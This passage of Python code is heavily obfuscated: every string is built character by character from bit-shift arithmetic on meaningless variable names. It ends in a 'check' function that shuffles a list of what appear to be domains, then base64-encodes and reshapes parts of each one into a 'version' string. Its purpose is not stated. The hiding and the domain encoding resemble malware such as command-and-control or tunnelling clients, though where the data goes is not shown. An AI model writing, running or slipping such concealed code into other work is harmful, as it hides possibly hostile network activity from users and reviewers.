[((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));________________qhlfeeufkrim=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_________________bpssooleeakr=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));__________________mkgflhargygg=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb)]));___________________nhavpoehslrx=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));____________________thusooxbhctn=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_____________________ymckkukhgbvc=str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));______________________thoquygtdlhk=str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));___________________________________wwyksdhmospv=((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)));____________________________________liacevohsqep=((((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))
def check(________________________sdjxilhjdjtv):
try :
global dom
global to
global version
to =str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(__mdujlsfdmxmj<<__mdujlsfdmxmj)+(___jalaznnmibpy<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____oumrhwochlkn<<(_oaowtpxvobjz**_oaowtpxvobjz))+(__mdujlsfdmxmj<<____oumrhwochlkn)+(______hotkgbptqejb<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))
version =(___jalaznnmibpy+____oumrhwochlkn)
_________________________vhusjytszcli=shuffle_Fox(___________onielzvjdokg)
for dom in _________________________vhusjytszcli:
if ('___________________________vuycrqbiwbsp' in locals()): del ___________________________vuycrqbiwbsp
if ( version !=(___jalaznnmibpy+____oumrhwochlkn)): version =(___jalaznnmibpy+____oumrhwochlkn)
try :
___________________________vuycrqbiwbsp=str(base64.b64encode(''.join(dom.split(str("".join(chr(__RSV) for __RSV in [(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])))[(_oaowtpxvobjz**_oaowtpxvobjz):]).upper().encode(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])))).decode(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]))))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])) in ___________________________vuycrqbiwbsp):
___________________________vuycrqbiwbsp=___________________________vuycrqbiwbsp.replace(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in [])))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])) in ___________________________vuycrqbiwbsp):
___________________________vuycrqbiwbsp=___________________________vuycrqbiwbsp.replace(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in [])))
version =str( version )+str("".join(chr(__RSV) for __RSV in [(_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))+___________________________vuycrqbiwbsp
